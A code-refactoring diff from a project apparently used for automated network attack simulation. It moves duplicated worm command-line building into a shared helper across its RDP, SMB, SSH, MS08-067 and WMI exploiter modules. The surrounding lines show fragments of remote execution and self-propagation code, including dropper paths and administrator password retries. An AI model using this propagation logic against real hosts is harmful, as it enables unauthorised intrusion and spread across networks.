merge duplicate code

chaos_monkey/exploit/rdpgrinder.py

@@ -13,6 +13,7 @@ from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
 from model.host import VictimHost
 from network.tools import check_port_tcp
 from exploit.tools import get_target_monkey
+from tools import build_monkey_commandline
 __author__ = 'hoffer'
 
 KEYS_INTERVAL = 0.1
@@ -259,14 +260,7 @@ class RdpExploiter(HostExploiter):
             LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
             return False
 
-        cmdline = " -p " + self._guid
-
-        if host.default_tunnel:
-            cmdline += " -t " + host.default_tunnel
-        if host.default_server:
-            cmdline += " -s " + host.default_server
-        if depth > 0:
-            cmdline += " -d %d" % (depth - 1)
+        cmdline = build_monkey_commandline(host, depth-1)
 
         if self._config.rdp_use_vbs_download:
             command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path, 'parameters': cmdline}

chaos_monkey/exploit/smbexec.py

@@ -6,6 +6,7 @@ from exploit import HostExploiter
 from network.tools import check_port_tcp
 from exploit.tools import SmbTools, get_target_monkey
 from network import SMBFinger
+from tools import build_monkey_commandline
 
 try:
     from impacket import smb
@@ -104,14 +105,7 @@ class SmbExploiter(HostExploiter):
         else:
             cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}
 
-        cmdline += " -p " + self._guid
-
-        if host.default_tunnel:
-            cmdline += " -t " + host.default_tunnel
-        if host.default_server:
-            cmdline += " -s " + host.default_server
-        if depth > 0:
-            cmdline += " -d %d" % (depth - 1)
+        cmdline +=  build_monkey_commandline(host, depth-1)
 
         for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
             rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))

chaos_monkey/exploit/sshexec.py

@@ -1,6 +1,7 @@
 import paramiko
 import monkeyfs
 import logging
+from tools import build_monkey_commandline
 from exploit import HostExploiter
 from model import MONKEY_ARG
 from exploit.tools import get_target_monkey
@@ -19,7 +20,6 @@ class SSHExploiter(HostExploiter):
 
     def __init__(self):
         self._config = __import__('config').WormConfiguration
-        self._guid = __import__('config').GUID
         self._update_timestamp = 0
 
     def log_transfer(self, transferred, total):
@@ -118,14 +118,7 @@ class SSHExploiter(HostExploiter):
 
         try:
             cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
-            cmdline += " -p " + self._guid
-            if host.default_tunnel:
-                cmdline += " -t " + host.default_tunnel
-            if host.default_server:
-                cmdline += " -s " + host.default_server
-            if depth > 0:
-                cmdline += " -d %d" % (depth - 1)
-
+            cmdline += build_monkey_commandline(host, depth-1)
             cmdline += "&"
             ssh.exec_command(cmdline)
 

chaos_monkey/exploit/tools.py

@@ -397,3 +397,21 @@ def get_target_monkey(host):
                 monkey_path = sys.executable
             
     return monkey_path
+
+
+def build_monkey_commandline(target_host, depth):
+    from config import WormConfiguration, GUID
+
+    cmdline = ""
+    cmdline += " -p " + GUID
+
+    if target_host.default_tunnel:
+        cmdline += " -t " + target_host.default_tunnel
+    if target_host.default_server:
+        cmdline += " -s " + target_host.default_server
+    if depth < 0:
+        depth = 0
+
+    cmdline += " -d %d" % depth
+
+    return cmdline

chaos_monkey/exploit/win_ms08_067.py

@@ -17,6 +17,7 @@ from . import HostExploiter
 from exploit.tools import SmbTools, get_target_monkey
 from network.tools import check_port_tcp
 from network import SMBFinger
+from tools import build_monkey_commandline
 
 try:
     from impacket import smb
@@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter):
                                               self._config.ms08_067_remote_user_pass,
                                               src_path,
                                               self._config.dropper_target_path)
+
         if not remote_full_path:
             # try other passwords for administrator
             for password in self._config.psexec_passwords:
@@ -250,14 +252,7 @@ class Ms08_067_Exploiter(HostExploiter):
         else:
             cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
 
-        cmdline += " -p " + self._guid
-
-        if host.default_tunnel:
-            cmdline += " -t " + host.default_tunnel
-        if host.default_server:
-            cmdline += " -s " + host.default_server
-        if depth > 0:
-            cmdline += " -d %d" % (depth - 1)
+        cmdline += build_monkey_commandline(host, depth - 1)
 
         try:
             sock.send("start %s\r\n" % (cmdline, ))

chaos_monkey/exploit/wmiexec.py

@@ -2,6 +2,7 @@ import socket
 import ntpath
 import logging
 import traceback
+from tools import build_monkey_commandline
 from model import DROPPER_CMDLINE, MONKEY_CMDLINE
 from model.host import VictimHost
 from exploit import HostExploiter
@@ -85,14 +86,7 @@ class WmiExploiter(HostExploiter):
             else:
                 cmdline = MONKEY_CMDLINE % {'monkey_path': remote_full_path}
 
-            cmdline += " -p " + self._guid
-
-            if host.default_tunnel:
-                cmdline += " -t " + host.default_tunnel
-            if host.default_server:
-                cmdline += " -s " + host.default_server
-            if depth > 0:
-                cmdline += " -d %d" % (depth - 1)
+            cmdline += build_monkey_commandline(host, depth - 1)
 
             # execute the remote monkey
             result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,